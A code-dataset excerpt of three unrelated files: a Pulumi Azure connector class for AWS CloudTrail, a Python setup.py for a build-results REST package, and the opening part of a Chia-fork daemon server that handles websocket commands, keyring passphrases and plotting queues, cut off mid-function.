:param pulumi.Input[str] aws_role_arn: The Aws Role Arn (with CloudTrailReadOnly policy) that is used to access the Aws account.
:param pulumi.Input[str] data_connector_id: Connector ID
:param pulumi.Input[str] etag: Etag of the azure resource
"""
pulumi.set(__self__, "data_types", data_types)
pulumi.set(__self__, "kind", 'AmazonWebServicesCloudTrail')
pulumi.set(__self__, "operational_insights_resource_provider", operational_insights_resource_provider)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "workspace_name", workspace_name)
if aws_role_arn is not None:
pulumi.set(__self__, "aws_role_arn", aws_role_arn)
if data_connector_id is not None:
pulumi.set(__self__, "data_connector_id", data_connector_id)
if etag is not None:
pulumi.set(__self__, "etag", etag)
@property
@pulumi.getter(name="dataTypes")
def data_types(self) -> pulumi.Input['AwsCloudTrailDataConnectorDataTypesArgs']:
"""
The available data types for the connector.
"""
return pulumi.get(self, "data_types")
@data_types.setter
def data_types(self, value: pulumi.Input['AwsCloudTrailDataConnectorDataTypesArgs']):
pulumi.set(self, "data_types", value)
@property
@pulumi.getter
def kind(self) -> pulumi.Input[str]:
"""
The kind of the data connector
Expected value is 'AmazonWebServicesCloudTrail'.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: pulumi.Input[str]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter(name="operationalInsightsResourceProvider")
def operational_insights_resource_provider(self) -> pulumi.Input[str]:
"""
The namespace of workspaces resource provider- Microsoft.OperationalInsights.
"""
return pulumi.get(self, "operational_insights_resource_provider")
@operational_insights_resource_provider.setter
def operational_insights_resource_provider(self, value: pulumi.Input[str]):
pulumi.set(self, "operational_insights_resource_provider", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="workspaceName")
def workspace_name(self) -> pulumi.Input[str]:
"""
The name of the workspace.
"""
return pulumi.get(self, "workspace_name")
@workspace_name.setter
def workspace_name(self, value: pulumi.Input[str]):
pulumi.set(self, "workspace_name", value)
@property
@pulumi.getter(name="awsRoleArn")
def aws_role_arn(self) -> Optional[pulumi.Input[str]]:
"""
The Aws Role Arn (with CloudTrailReadOnly policy) that is used to access the Aws account.
"""
return pulumi.get(self, "aws_role_arn")
@aws_role_arn.setter
def aws_role_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "aws_role_arn", value)
@property
@pulumi.getter(name="dataConnectorId")
def data_connector_id(self) -> Optional[pulumi.Input[str]]:
"""
Connector ID
"""
return pulumi.get(self, "data_connector_id")
@data_connector_id.setter
def data_connector_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_connector_id", value)
@property
@pulumi.getter
def etag(self) -> Optional[pulumi.Input[str]]:
"""
Etag of the azure resource
"""
return pulumi.get(self, "etag")
@etag.setter
def etag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "etag", value)
class AwsCloudTrailDataConnector(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
aws_role_arn: Optional[pulumi.Input[str]] = None,
data_connector_id: Optional[pulumi.Input[str]] = None,
data_types: Optional[pulumi.Input[pulumi.InputType['AwsCloudTrailDataConnectorDataTypesArgs']]] = None,
etag: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
operational_insights_resource_provider: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Represents Amazon Web Services CloudTrail data connector.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] aws_role_arn: The Aws Role Arn (with CloudTrailReadOnly policy) that is used to access the Aws account.
:param pulumi.Input[str] data_connector_id: Connector ID
:param pulumi.Input[pulumi.InputType['AwsCloudTrailDataConnectorDataTypesArgs']] data_types: The available data types for the connector.
:param pulumi.Input[str] etag: Etag of the azure resource
:param pulumi.Input[str] kind: The kind of the data connector
Expected value is 'AmazonWebServicesCloudTrail'.
:param pulumi.Input[str] operational_insights_resource_provider: The namespace of workspaces resource provider- Microsoft.OperationalInsights.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] workspace_name: The name of the workspace.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AwsCloudTrailDataConnectorArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Represents Amazon Web Services CloudTrail data connector.
:param str resource_name: The name of the resource.
:param AwsCloudTrailDataConnectorArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AwsCloudTrailDataConnectorArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
aws_role_arn: Optional[pulumi.Input[str]] = None,
data_connector_id: Optional[pulumi.Input[str]] = None,
data_types: Optional[pulumi.Input[pulumi.InputType['AwsCloudTrailDataConnectorDataTypesArgs']]] = None,
etag: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
operational_insights_resource_provider: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AwsCloudTrailDataConnectorArgs.__new__(AwsCloudTrailDataConnectorArgs)
__props__.__dict__["aws_role_arn"] = aws_role_arn
__props__.__dict__["data_connector_id"] = data_connector_id
if data_types is None and not opts.urn:
raise TypeError("Missing required property 'data_types'")
__props__.__dict__["data_types"] = data_types
__props__.__dict__["etag"] = etag
if kind is None and not opts.urn:
raise TypeError("Missing required property 'kind'")
__props__.__dict__["kind"] = 'AmazonWebServicesCloudTrail'
if operational_insights_resource_provider is None and not opts.urn:
raise TypeError("Missing required property 'operational_insights_resource_provider'")
__props__.__dict__["operational_insights_resource_provider"] = operational_insights_resource_provider
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if workspace_name is None and not opts.urn:
raise TypeError("Missing required property 'workspace_name'")
__props__.__dict__["workspace_name"] = workspace_name
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:securityinsights/v20210301preview:AwsCloudTrailDataConnector"), pulumi.Alias(type_="azure-native:securityinsights:AwsCloudTrailDataConnector"), pulumi.Alias(type_="azure-nextgen:securityinsights:AwsCloudTrailDataConnector"), pulumi.Alias(type_="azure-native:securityinsights/v20190101preview:AwsCloudTrailDataConnector"), pulumi.Alias(type_="azure-nextgen:securityinsights/v20190101preview:AwsCloudTrailDataConnector"), pulumi.Alias(type_="azure-native:securityinsights/v20200101:AwsCloudTrailDataConnector"), pulumi.Alias(type_="azure-nextgen:securityinsights/v20200101:AwsCloudTrailDataConnector")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(AwsCloudTrailDataConnector, __self__).__init__(
'azure-native:securityinsights/v20210301preview:AwsCloudTrailDataConnector',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'AwsCloudTrailDataConnector':
"""
Get an existing AwsCloudTrailDataConnector resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = AwsCloudTrailDataConnectorArgs.__new__(AwsCloudTrailDataConnectorArgs)
__props__.__dict__["aws_role_arn"] = None
__props__.__dict__["data_types"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return AwsCloudTrailDataConnector(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="awsRoleArn")
def aws_role_arn(self) -> pulumi.Output[Optional[str]]:
"""
The Aws Role Arn (with CloudTrailReadOnly policy) that is used to access the Aws account.
"""
return pulumi.get(self, "aws_role_arn")
@property
@pulumi.getter(name="dataTypes")
def data_types(self) -> pulumi.Output['outputs.AwsCloudTrailDataConnectorDataTypesResponse']:
"""
The available data types for the connector.
"""
return pulumi.get(self, "data_types")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[Optional[str]]:
"""
Etag of the azure resource
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
"""
The kind of the data connector
Expected value is 'AmazonWebServicesCloudTrail'.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Azure resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
Azure Resource Manager metadata containing createdBy and modifiedBy information.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Azure resource type
"""
return pulumi.get(self, "type")
| 45.987988
| 688
| 0.669845
|
b38a438a40e0e069828d4a94d82975d93fe58b77
| 2,034
|
py
|
Python
|
setup.py
|
eugene-davis/ebr-board
|
f592a752e17e869a6fd35ef82398f97748dbdc78
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
eugene-davis/ebr-board
|
f592a752e17e869a6fd35ef82398f97748dbdc78
|
[
"Apache-2.0"
] | 4
|
2019-08-02T09:35:51.000Z
|
2019-08-05T04:45:47.000Z
|
setup.py
|
LaudateCorpus1/ebr-board
|
f592a752e17e869a6fd35ef82398f97748dbdc78
|
[
"Apache-2.0"
] | 1
|
2021-09-14T03:58:40.000Z
|
2021-09-14T03:58:40.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from __future__ import with_statement
try:
from setuptools import setup, find_packages
except ImportError:
from distutils.core import setup, find_packages
import ebr_board
with open("README.md") as readme_file:
readme = readme_file.read()
with open("CHANGELOG.md") as changelog_file:
changelog = changelog_file.read()
requirements = [
"ebr-connector>=0.1.4,<0.2",
"Flask>=1.1.0,<2",
"flask-restplus>=0.12.1,<0.13",
"pendulum>=2.0.5,<3",
"vault-anyconfig>=0.3.1,<0.4",
"PyYAML>=5.1,<6",
]
extras_require = {"aws_lambda": ["aws-wsgi>=0.2.0", "ssm-parameter-store>=19.5.0,<20.0.0"]}
# Ensure that linting and testing will be done with all depedencies installed
collected_extras = []
for req_set in extras_require.values():
collected_extras += req_set
setup_requirements = ["pytest-runner"] + collected_extras
test_requirements = ["pytest", "pytest-cov", "coverage"]
setup(
author=ebr_board.__author__,
author_email=ebr_board.__email__,
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Natural Language :: English",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
description="RESTful interface for Elastic Build Results.",
install_requires=requirements,
license="Apache Software License 2.0",
long_description=readme + "\n\n" + changelog,
long_description_content_type="text/markdown",
include_package_data=True,
keywords="ebr_board",
name="ebr_board",
packages=find_packages(),
setup_requires=setup_requirements,
test_suite="tests",
tests_require=test_requirements,
extras_require=extras_require,
url="https://github.com/tomtom-international/ebr-board",
version=ebr_board.__version__,
zip_safe=False,
)
| 28.647887
| 91
| 0.681416
|
48e4ec8f0bb24d3b7361383795691bf2f1009655
| 51,768
|
py
|
Python
|
chia/daemon/server.py
|
Heather-Network/heather-blockchain
|
75a37c6f54d98b5c36c5e8cf5b27c5ed9ae977fa
|
[
"Apache-2.0"
] | 1
|
2021-09-19T18:57:21.000Z
|
2021-09-19T18:57:21.000Z
|
chia/daemon/server.py
|
Heather-Network/heather-blockchain
|
75a37c6f54d98b5c36c5e8cf5b27c5ed9ae977fa
|
[
"Apache-2.0"
] | null | null | null |
chia/daemon/server.py
|
Heather-Network/heather-blockchain
|
75a37c6f54d98b5c36c5e8cf5b27c5ed9ae977fa
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import json
import logging
import os
import signal
import subprocess
import sys
import time
import traceback
import uuid
from concurrent.futures import ThreadPoolExecutor
from enum import Enum
from pathlib import Path
from typing import Any, Dict, List, Optional, TextIO, Tuple, cast
from websockets import ConnectionClosedOK, WebSocketException, WebSocketServerProtocol, serve
from chia.cmds.init_funcs import check_keys, chia_init
from chia.cmds.passphrase_funcs import default_passphrase, using_default_passphrase
from chia.daemon.keychain_server import KeychainServer, keychain_commands
from chia.daemon.windows_signal import kill
from chia.server.server import ssl_context_for_root, ssl_context_for_server
from chia.ssl.create_ssl import get_mozilla_ca_crt
from chia.util.chia_logging import initialize_logging
from chia.util.config import load_config
from chia.util.json_util import dict_to_json_str
from chia.util.keychain import (
Keychain,
KeyringCurrentPassphraseIsInvalid,
KeyringRequiresMigration,
passphrase_requirements,
supports_keyring_passphrase,
supports_os_passphrase_storage,
)
from chia.util.path import mkdir
from chia.util.service_groups import validate_service
from chia.util.setproctitle import setproctitle
from chia.util.ws_message import WsRpcMessage, create_payload, format_response
io_pool_exc = ThreadPoolExecutor()
try:
from aiohttp import ClientSession, web
except ModuleNotFoundError:
print("Error: Make sure to run . ./activate from the project folder before starting heather.")
quit()
try:
import fcntl
has_fcntl = True
except ImportError:
has_fcntl = False
#log = logging.getLogger(_ _name__)
log = logging.getLogger("heather.daemon.server")
service_plotter = "heather plots create"
async def fetch(url: str):
async with ClientSession() as session:
try:
mozilla_root = get_mozilla_ca_crt()
ssl_context = ssl_context_for_root(mozilla_root, log=log)
response = await session.get(url, ssl=ssl_context)
if not response.ok:
log.warning("Response not OK.")
return None
return await response.text()
except Exception as e:
log.error(f"Exception while fetching {url}, exception: {e}")
return None
class PlotState(str, Enum):
SUBMITTED = "SUBMITTED"
RUNNING = "RUNNING"
REMOVING = "REMOVING"
FINISHED = "FINISHED"
class PlotEvent(str, Enum):
LOG_CHANGED = "log_changed"
STATE_CHANGED = "state_changed"
# determine if application is a script file or frozen exe
if getattr(sys, "frozen", False):
name_map = {
"heather": "chia",
"heather_wallet": "start_wallet",
"heather_full_node": "start_full_node",
"heather_harvester": "start_harvester",
"heather_farmer": "start_farmer",
"heather_introducer": "start_introducer",
"heather_timelord": "start_timelord",
"heather_timelord_launcher": "timelord_launcher",
"heather_full_node_simulator": "start_simulator",
}
def executable_for_service(service_name: str) -> str:
application_path = os.path.dirname(sys.executable)
if sys.platform == "win32" or sys.platform == "cygwin":
executable = name_map[service_name]
path = f"{application_path}/{executable}.exe"
return path
else:
path = f"{application_path}/{name_map[service_name]}"
return path
else:
application_path = os.path.dirname(__file__)
def executable_for_service(service_name: str) -> str:
return service_name
async def ping() -> Dict[str, Any]:
response = {"success": True, "value": "pong"}
return response
class WebSocketServer:
def __init__(
self,
root_path: Path,
ca_crt_path: Path,
ca_key_path: Path,
crt_path: Path,
key_path: Path,
run_check_keys_on_unlock: bool = False,
):
self.root_path = root_path
self.log = log
self.services: Dict = dict()
self.plots_queue: List[Dict] = []
self.connections: Dict[str, List[WebSocketServerProtocol]] = dict() # service_name : [WebSocket]
self.remote_address_map: Dict[WebSocketServerProtocol, str] = dict() # socket: service_name
self.ping_job: Optional[asyncio.Task] = None
self.net_config = load_config(root_path, "config.yaml")
self.self_hostname = self.net_config["self_hostname"]
self.daemon_port = self.net_config["daemon_port"]
self.daemon_max_message_size = self.net_config.get("daemon_max_message_size", 50 * 1000 * 1000)
self.websocket_server = None
self.ssl_context = ssl_context_for_server(ca_crt_path, ca_key_path, crt_path, key_path, log=self.log)
self.shut_down = False
self.keychain_server = KeychainServer()
self.run_check_keys_on_unlock = run_check_keys_on_unlock
async def start(self):
self.log.info("Starting Daemon Server")
def master_close_cb():
asyncio.create_task(self.stop())
try:
asyncio.get_running_loop().add_signal_handler(signal.SIGINT, master_close_cb)
asyncio.get_running_loop().add_signal_handler(signal.SIGTERM, master_close_cb)
except NotImplementedError:
self.log.info("Not implemented")
self.websocket_server = await serve(
self.safe_handle,
self.self_hostname,
self.daemon_port,
max_size=self.daemon_max_message_size,
ping_interval=500,
ping_timeout=300,
ssl=self.ssl_context,
)
self.log.info("Waiting Daemon WebSocketServer closure")
def cancel_task_safe(self, task: Optional[asyncio.Task]):
if task is not None:
try:
task.cancel()
except Exception as e:
self.log.error(f"Error while canceling task.{e} {task}")
async def stop(self) -> Dict[str, Any]:
self.shut_down = True
self.cancel_task_safe(self.ping_job)
await self.exit()
if self.websocket_server is not None:
self.websocket_server.close()
return {"success": True}
async def safe_handle(self, websocket: WebSocketServerProtocol, path: str):
service_name = ""
try:
async for message in websocket:
try:
decoded = json.loads(message)
if "data" not in decoded:
decoded["data"] = {}
response, sockets_to_use = await self.handle_message(websocket, decoded)
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Error while handling message: {tb}")
error = {"success": False, "error": f"{e}"}
response = format_response(decoded, error)
sockets_to_use = []
if len(sockets_to_use) > 0:
for socket in sockets_to_use:
try:
await socket.send(response)
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Unexpected exception trying to send to websocket: {e} {tb}")
self.remove_connection(socket)
await socket.close()
except Exception as e:
tb = traceback.format_exc()
service_name = "Unknown"
if websocket in self.remote_address_map:
service_name = self.remote_address_map[websocket]
if isinstance(e, ConnectionClosedOK):
self.log.info(f"ConnectionClosedOk. Closing websocket with {service_name} {e}")
elif isinstance(e, WebSocketException):
self.log.info(f"Websocket exception. Closing websocket with {service_name} {e} {tb}")
else:
self.log.error(f"Unexpected exception in websocket: {e} {tb}")
finally:
self.remove_connection(websocket)
await websocket.close()
def remove_connection(self, websocket: WebSocketServerProtocol):
service_name = None
if websocket in self.remote_address_map:
service_name = self.remote_address_map[websocket]
self.remote_address_map.pop(websocket)
if service_name in self.connections:
after_removal = []
for connection in self.connections[service_name]:
if connection == websocket:
continue
else:
after_removal.append(connection)
self.connections[service_name] = after_removal
async def ping_task(self) -> None:
restart = True
await asyncio.sleep(30)
for remote_address, service_name in self.remote_address_map.items():
if service_name in self.connections:
sockets = self.connections[service_name]
for socket in sockets:
if socket.remote_address[1] == remote_address:
try:
self.log.info(f"About to ping: {service_name}")
await socket.ping()
except asyncio.CancelledError:
self.log.info("Ping task received Cancel")
restart = False
break
except Exception as e:
self.log.info(f"Ping error: {e}")
self.log.warning("Ping failed, connection closed.")
self.remove_connection(socket)
await socket.close()
if restart is True:
self.ping_job = asyncio.create_task(self.ping_task())
async def handle_message(
self, websocket: WebSocketServerProtocol, message: WsRpcMessage
) -> Tuple[Optional[str], List[Any]]:
"""
This function gets called when new message is received via websocket.
"""
command = message["command"]
destination = message["destination"]
if destination != "daemon":
destination = message["destination"]
if destination in self.connections:
sockets = self.connections[destination]
return dict_to_json_str(message), sockets
return None, []
data = message["data"]
commands_with_data = [
"start_service",
"start_plotting",
"stop_plotting",
"stop_service",
"is_running",
"register_service",
]
if len(data) == 0 and command in commands_with_data:
response = {"success": False, "error": f'{command} requires "data"'}
# Keychain commands should be handled by KeychainServer
elif command in keychain_commands and supports_keyring_passphrase():
response = await self.keychain_server.handle_command(command, data)
elif command == "ping":
response = await ping()
elif command == "start_service":
response = await self.start_service(cast(Dict[str, Any], data))
elif command == "start_plotting":
response = await self.start_plotting(cast(Dict[str, Any], data))
elif command == "stop_plotting":
response = await self.stop_plotting(cast(Dict[str, Any], data))
elif command == "stop_service":
response = await self.stop_service(cast(Dict[str, Any], data))
elif command == "is_running":
response = await self.is_running(cast(Dict[str, Any], data))
elif command == "is_keyring_locked":
response = await self.is_keyring_locked()
elif command == "keyring_status":
response = await self.keyring_status()
elif command == "unlock_keyring":
response = await self.unlock_keyring(cast(Dict[str, Any], data))
elif command == "validate_keyring_passphrase":
response = await self.validate_keyring_passphrase(cast(Dict[str, Any], data))
elif command == "migrate_keyring":
response = await self.migrate_keyring(cast(Dict[str, Any], data))
elif command == "set_keyring_passphrase":
response = await self.set_keyring_passphrase(cast(Dict[str, Any], data))
elif command == "remove_keyring_passphrase":
response = await self.remove_keyring_passphrase(cast(Dict[str, Any], data))
elif command == "notify_keyring_migration_completed":
response = await self.notify_keyring_migration_completed(cast(Dict[str, Any], data))
elif command == "exit":
response = await self.stop()
elif command == "register_service":
response = await self.register_service(websocket, cast(Dict[str, Any], data))
elif command == "get_status":
response = self.get_status()
else:
self.log.error(f"UK>> {message}")
response = {"success": False, "error": f"unknown_command {command}"}
full_response = format_response(message, response)
return full_response, [websocket]
async def is_keyring_locked(self) -> Dict[str, Any]:
locked: bool = Keychain.is_keyring_locked()
response: Dict[str, Any] = {"success": True, "is_keyring_locked": locked}
return response
async def keyring_status(self) -> Dict[str, Any]:
passphrase_support_enabled: bool = supports_keyring_passphrase()
can_save_passphrase: bool = supports_os_passphrase_storage()
user_passphrase_is_set: bool = Keychain.has_master_passphrase() and not using_default_passphrase()
locked: bool = Keychain.is_keyring_locked()
needs_migration: bool = Keychain.needs_migration()
can_remove_legacy_keys: bool = False # Disabling GUI support for removing legacy keys post-migration
can_set_passphrase_hint: bool = True
passphrase_hint: str = Keychain.get_master_passphrase_hint() or ""
requirements: Dict[str, Any] = passphrase_requirements()
response: Dict[str, Any] = {
"success": True,
"is_keyring_locked": locked,
"passphrase_support_enabled": passphrase_support_enabled,
"can_save_passphrase": can_save_passphrase,
"user_passphrase_is_set": user_passphrase_is_set,
"needs_migration": needs_migration,
"can_remove_legacy_keys": can_remove_legacy_keys,
"can_set_passphrase_hint": can_set_passphrase_hint,
"passphrase_hint": passphrase_hint,
"passphrase_requirements": requirements,
}
return response
async def unlock_keyring(self, request: Dict[str, Any]) -> Dict[str, Any]:
success: bool = False
error: Optional[str] = None
key: Optional[str] = request.get("key", None)
if type(key) is not str:
return {"success": False, "error": "missing key"}
try:
if Keychain.master_passphrase_is_valid(key, force_reload=True):
Keychain.set_cached_master_passphrase(key)
success = True
# Inform the GUI of keyring status changes
self.keyring_status_changed(await self.keyring_status(), "wallet_ui")
else:
error = "bad passphrase"
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Keyring passphrase validation failed: {e} {tb}")
error = "validation exception"
if success and self.run_check_keys_on_unlock:
try:
self.log.info("Running check_keys now that the keyring is unlocked")
check_keys(self.root_path)
self.run_check_keys_on_unlock = False
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"check_keys failed after unlocking keyring: {e} {tb}")
response: Dict[str, Any] = {"success": success, "error": error}
return response
async def validate_keyring_passphrase(self, request: Dict[str, Any]) -> Dict[str, Any]:
success: bool = False
error: Optional[str] = None
key: Optional[str] = request.get("key", None)
if type(key) is not str:
return {"success": False, "error": "missing key"}
try:
success = Keychain.master_passphrase_is_valid(key, force_reload=True)
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Keyring passphrase validation failed: {e} {tb}")
error = "validation exception"
response: Dict[str, Any] = {"success": success, "error": error}
return response
async def migrate_keyring(self, request: Dict[str, Any]) -> Dict[str, Any]:
if Keychain.needs_migration() is False:
# If the keyring has already been migrated, we'll raise an error to the client.
# The reason for raising an error is because the migration request has side-
# effects beyond copying keys from the legacy keyring to the new keyring. The
# request may have set a passphrase and indicated that keys should be cleaned
# from the legacy keyring. If we were to return early and indicate success,
# the client and user's expectations may not match reality (were my keys
# deleted from the legacy keyring? was my passphrase set?).
return {"success": False, "error": "migration not needed"}
success: bool = False
error: Optional[str] = None
passphrase: Optional[str] = request.get("passphrase", None)
passphrase_hint: Optional[str] = request.get("passphrase_hint", None)
save_passphrase: bool = request.get("save_passphrase", False)
cleanup_legacy_keyring: bool = request.get("cleanup_legacy_keyring", False)
if passphrase is not None and type(passphrase) is not str:
return {"success": False, "error": 'expected string value for "passphrase"'}
if passphrase_hint is not None and type(passphrase_hint) is not str:
return {"success": False, "error": 'expected string value for "passphrase_hint"'}
if not Keychain.passphrase_meets_requirements(passphrase):
return {"success": False, "error": "passphrase doesn't satisfy requirements"}
if type(cleanup_legacy_keyring) is not bool:
return {"success": False, "error": 'expected bool value for "cleanup_legacy_keyring"'}
try:
Keychain.migrate_legacy_keyring(
passphrase=passphrase,
passphrase_hint=passphrase_hint,
save_passphrase=save_passphrase,
cleanup_legacy_keyring=cleanup_legacy_keyring,
)
success = True
# Inform the GUI of keyring status changes
self.keyring_status_changed(await self.keyring_status(), "wallet_ui")
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Legacy keyring migration failed: {e} {tb}")
error = f"keyring migration failed: {e}"
response: Dict[str, Any] = {"success": success, "error": error}
return response
async def set_keyring_passphrase(self, request: Dict[str, Any]) -> Dict[str, Any]:
success: bool = False
error: Optional[str] = None
current_passphrase: Optional[str] = None
new_passphrase: Optional[str] = None
passphrase_hint: Optional[str] = request.get("passphrase_hint", None)
save_passphrase: bool = request.get("save_passphrase", False)
if using_default_passphrase():
current_passphrase = default_passphrase()
if Keychain.has_master_passphrase() and not current_passphrase:
current_passphrase = request.get("current_passphrase", None)
if type(current_passphrase) is not str:
return {"success": False, "error": "missing current_passphrase"}
new_passphrase = request.get("new_passphrase", None)
if type(new_passphrase) is not str:
return {"success": False, "error": "missing new_passphrase"}
if not Keychain.passphrase_meets_requirements(new_passphrase):
return {"success": False, "error": "passphrase doesn't satisfy requirements"}
try:
assert new_passphrase is not None # mypy, I love you
Keychain.set_master_passphrase(
current_passphrase,
new_passphrase,
allow_migration=False,
passphrase_hint=passphrase_hint,
save_passphrase=save_passphrase,
)
except KeyringRequiresMigration:
error = "keyring requires migration"
except KeyringCurrentPassphraseIsInvalid:
error = "current passphrase is invalid"
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Failed to set keyring passphrase: {e} {tb}")
else:
success = True
# Inform the GUI of keyring status changes
self.keyring_status_changed(await self.keyring_status(), "wallet_ui")
response: Dict[str, Any] = {"success": success, "error": error}
return response
async def remove_keyring_passphrase(self, request: Dict[str, Any]) -> Dict[str, Any]:
success: bool = False
error: Optional[str] = None
current_passphrase: Optional[str] = None
if not Keychain.has_master_passphrase():
return {"success": False, "error": "passphrase not set"}
current_passphrase = request.get("current_passphrase", None)
if type(current_passphrase) is not str:
return {"success": False, "error": "missing current_passphrase"}
try:
Keychain.remove_master_passphrase(current_passphrase)
except KeyringCurrentPassphraseIsInvalid:
error = "current passphrase is invalid"
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Failed to remove keyring passphrase: {e} {tb}")
else:
success = True
# Inform the GUI of keyring status changes
self.keyring_status_changed(await self.keyring_status(), "wallet_ui")
response: Dict[str, Any] = {"success": success, "error": error}
return response
async def notify_keyring_migration_completed(self, request: Dict[str, Any]) -> Dict[str, Any]:
success: bool = False
error: Optional[str] = None
key: Optional[str] = request.get("key", None)
if type(key) is not str:
return {"success": False, "error": "missing key"}
Keychain.handle_migration_completed()
try:
if Keychain.master_passphrase_is_valid(key, force_reload=True):
Keychain.set_cached_master_passphrase(key)
success = True
# Inform the GUI of keyring status changes
self.keyring_status_changed(await self.keyring_status(), "wallet_ui")
else:
error = "bad passphrase"
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Keyring passphrase validation failed: {e} {tb}")
error = "validation exception"
response: Dict[str, Any] = {"success": success, "error": error}
return response
def get_status(self) -> Dict[str, Any]:
response = {"success": True, "genesis_initialized": True}
return response
async def _keyring_status_changed(self, keyring_status: Dict[str, Any], destination: str):
"""
Attempt to communicate with the GUI to inform it of any keyring status changes
(e.g. keyring becomes unlocked or migration completes)
"""
websockets = self.connections.get("wallet_ui", None)
if websockets is None:
return None
if keyring_status is None:
return None
response = create_payload("keyring_status_changed", keyring_status, "daemon", destination)
for websocket in websockets:
try:
await websocket.send(response)
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Unexpected exception trying to send to websocket: {e} {tb}")
websockets.remove(websocket)
await websocket.close()
def keyring_status_changed(self, keyring_status: Dict[str, Any], destination: str):
asyncio.create_task(self._keyring_status_changed(keyring_status, destination))
def plot_queue_to_payload(self, plot_queue_item, send_full_log: bool) -> Dict[str, Any]:
error = plot_queue_item.get("error")
has_error = error is not None
item = {
"id": plot_queue_item["id"],
"queue": plot_queue_item["queue"],
"size": plot_queue_item["size"],
"parallel": plot_queue_item["parallel"],
"delay": plot_queue_item["delay"],
"state": plot_queue_item["state"],
"error": str(error) if has_error else None,
"deleted": plot_queue_item["deleted"],
"log_new": plot_queue_item.get("log_new"),
}
if send_full_log:
item["log"] = plot_queue_item.get("log")
return item
def prepare_plot_state_message(self, state: PlotEvent, id):
message = {
"state": state,
"queue": self.extract_plot_queue(id),
}
return message
def extract_plot_queue(self, id=None) -> List[Dict]:
send_full_log = id is None
data = []
for item in self.plots_queue:
if id is None or item["id"] == id:
data.append(self.plot_queue_to_payload(item, send_full_log))
return data
async def _state_changed(self, service: str, message: Dict[str, Any]):
"""If id is None, send the whole state queue"""
if service not in self.connections:
return None
websockets = self.connections[service]
